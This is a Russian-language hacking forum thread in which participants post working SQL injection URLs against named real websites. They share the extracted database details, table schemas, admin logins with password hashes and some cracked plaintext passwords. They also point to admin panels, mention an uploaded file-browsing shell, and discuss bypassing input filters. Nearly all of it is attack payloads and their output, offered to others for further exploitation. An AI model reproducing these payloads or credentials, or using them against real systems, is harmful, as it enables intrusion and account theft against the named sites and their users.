Code: http://www.evangelici.net/links/?viewCat=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2/* Code: http://www.e-romanticos.com/autor.php?id=1%20UNION%20SELECT%20concat_ws(0x3a,version(),database(),user()),2,3,4,5,6,7,8/* Code: http://www.anycorp.com/any/magazine.php?id=1%20UNION%20SELECT%201,2,concat_ws(0x3a,version(),database(),user()),4,5%20LIMIT%201,1/*
Code: http://psyforum.ru/pssite/article_list.php?id=-1)+union+select+1,2,3,convert(concat(user(),0x20,database(),0x20,version())+using+cp1251)/*
http://reno.broowaha.com Code: http://reno.broowaha.com/profile.php?id=1516=null%20union%20all%20select%200,1,2,3,4,5,6,7,concat(version(),0x7c,database(),0x7c,user()),9,10,11,12,13,14,15,16,17,18-- version() => 4.0.27-standard-log database() => db162098511 user() => [email protected] http://employmenttimesonline.com Code: http://www.employmenttimesonline.com/companies/profile.php?ID=93=null%20union%20all%20select%200,1,2,3,4,concat(version(),0x3c62723e,database(),0x3c62723e,user()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- version() => 4.0.16-standard database() => employ_et1m3s user() => employ_employ@localhost http://www.noborder.org Code: http://www.noborder.org/item.php?id=372=null%20union%20all%20select%200,1,concat(version(),0x3c62723e,database(),0x3c62723e,user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- version() => 4.1.22 database() => nob user() => paul@localhost http://www.dramapod.com Code: http://www.dramapod.com/item.php?catid=139=null union all select 0,concat(version(),0x3c62723e,database(),0x3c62723e,user())-- version() => 5.0.51a-community database() => dramapod_live user() => dramapod_dpuser@localhost БД: Code: dramapod_live Таблицы dramapod_live: Code: dp_reviews[item, rstatus, rip, rname, remail, rurl, rrating, review, reviewdate] dp_status[desc] dp_users[uname, pass] dp_views[item, ip, viewdate, processed] dp_votes[voter, item, rating, votedate, processed]
Залил скрипт - можно пошариться по серваку http://www.geoimport.ge/uploads/dir.php?cd=./../../doc/admin
Ща тебя пошарят немного. Ты читал как раздел называеться ? Тут ток скуль иньекцыи, а шелы, фтп и прочая гадость в разделе Халява
_http://www.globalsmokefreepartnership.org/news.php?id=251+order+by+4/* _http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4/* _http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,version(),3,4/* 4.1.22 _http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,2,3,4+from+membe rs/* _http://www.globalsmokefreepartnership.org/news.php?id=999999+UNION+SELECT+1,username,email,p assword+from+members+limit+356,2/*
Новая социальная сеть книголюбов BookMix.ru Предистория: Сижу както на работе днем. Делать особо нечего. Почитываю новости, и натыкаюсь на интересный заголовок "Открылась социальная сеть книголюбов BookMix.ru". Думаю а дайка посмотрю, че за сеть то?)) Захожу, вижу новости...в строке передается id. Первая мысль - SQL-Inj. И опа...вуоля!)))) Действительно инъект. Нехитрыми манипуляциями подбираю столбцы. PHP: http://bookmix.ru/news/index.phtml?id=-48+union +select+1,2,3,4,5, 6,7,8,9,10,11/* USER(): bookmix@localhost DATABASE(): bookmix VERSION(): 5.0.22 Есть доступ до information_schema, а посему поковырял таблицы, есть 2 интересные, с полями соответсвенно: Code: admins -user_id -name -login -pass Code: users -user_id -name -login -pass -email -icq -skype -description -birthday -showage -sex -phone -howtohear -photo -photo_tn -photo_tn2 -status -regdate -logged -lastvisit -referrer -privatemessagesnotification -friends -reviews -comments -online -regcode -read -ireadadddate admins Code: 1: pechatnick: pechatnick: 7ac2262d4ca6e2de63094a51225b00ee ([COLOR=Red]stroka[/COLOR]) У кого есть желание, ковыряйте дальше))
-=Static=-, добил сайтег: Code: Админка тут - http://bookmix.ru/_admin/ pechatnick:stroka Кстати много интересного
Интересный сайт очень. Инъекцию обнаружил сразу, но там какая-то хитрая защита судя по всему имеется. В общем попробуйте: http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14/* все кроме цифр режется почему-то. Ни одну функцию заюзать не могу.
Вот ещё сайтег. При возникновении ошибки SQL выдает довольно подробный отчет по ошибке Но внутрь я залезть что-то не смог ( http://www.boreme.com/members/viewviral.php?viral_id=18891%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12/*&siteid=55336
Вот ещё сайтик. Сразу с мемберами выложил http://englishspectrum.net/jobkorea/findpeople.html?include=form&mode=view&id=-99 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,member_id,temp_passwd,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86 from english_member limit 1,1/*&lc=&sc=&mc=&pp=&gid=1&&&search_YN=Y
http://www.bestonlinevalue.com/upgrade.php?ucat=-1086/**/union/**/select/**/1,22,23,24,column_name,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55/**/from/**/information_schema.columns+where+table_name=0x70617970616C5F636172745F696E666F+limit+0,1--
http://web.anir.mn/modules.php?name=News&file=article&sid=-99%20union%20select%201,2,3,0x76657273696F6E2829,0x76657273696F6E2829,0x404076657273696F6E,7,8,0x76657273696F6E2829,10,11,12,13,14/* подстава одназначно
С чего вдруг??? Если ты написал version() в 16ричном виде, то это уже не version(), а строка version(). тут никакой подставы. Тут фишка в другом совсем. В других местах все параметры экранируются. Пробой только в этом месте. Вероятно CMS, на которой построен портал сначала сама обрабатывает урлы (режет лишнее и подозрительные слова), а потом передает дальше, в бажные скрипты ))). Скорее всего это можно обойти, но у меня вариантов пока нет.
там php-nuke 6 версии, вот так можно выдрать логины хэши админов: Code: http://web.anir.mn/modules.php?name=News&file=article&sid=-99+union+select+1,2,3,4,pwd,aid,7,8,9,10,11,12,13,14+from+nuke_authors+limit+0,1/* http://web.anir.mn/modules.php?name=News&file=article&sid=-99+union+select+1,2,3,4,pwd,aid,7,8,9,10,11,12,13,14+from+nuke_authors+limit+1,1/* ... baska:d88e1207b4f325297ef25cb2b049b33b: bete:217de01e5b8aad8ce45d75ddaa2a27a9: eegiiz:4846eaa06bfc1fa22df6ebce7f390cc7: aliye:aa70fea8443ea26ca24d204069147b71: hehe:e10adc3949ba59abbe56e057f20f883e:123456
Доброе утро. http://sotka.ru/ Вот то что вытянул из базы (MSSQL) NastrSet infobj NastrPhones NastrList Archive History Right_List TV_Program TreeList Accessuars accessuars_name Hard AllBase History_Archive Statii_Rubrics AllPhone Black_List City Instr Constants Statii_in_rubrics sessions >session_id >session_user_id >session_start >session_time >session_ip >session_logged_in >session_admin Credits sessions_keys Glossary TV_Picture GuestBook Jurnal TV_Mistake Jurnal_CFG TV_Announce Pictures Mailer Statii Mailer_Log Mistakes Money >id >data >num_subj >num_credit >credit >in_out >num_disp Sotovik_Err Digital_Tech Operators Pagers Phones_S RestrictedPhones Users_contacts Users_right >id_user_rights >id_rights_info Users_rights_info >id_right >right_maxmess >right_info Users_list >user_id >user_active >username >user_password >user_session_time >user_lastvisit >user_regdate >user_email >user_newpasswd >user_notify >user_regphone Юзер с Id = 1 Это гость. С id=2 похоже на админа Имя БД: Cotka логин: Andre хэш: 24f64722693735931efd98aa4bb37e9b Скуль : http://sotka.ru/BS/view.asp?nm=SQLINJ Также "Админка" http://sotka.ru/admin/ похоже ищет в таблице сессий ( вот тут session_admin) прежде чем пустить. Вопрос вот такой: Там имеется табличка сессий, с соответствующими столбиками Кто догадается как сделать UPDATE/INSERT ? У меня не получается пока что
Пароль юзера Andre: paradis Насколько я знаю, внтури селекта ни Апдейт ни Инсерт невозможно выполнить. По крайней мере в мускуле
Ну это и не мускуль -) А пароль мне ничего не дал -( Делов том что залогинившись и пойдя в админку меня выкинуло! Хотя вчера когда я залогинен небыл, на ее индекс меня пускало...
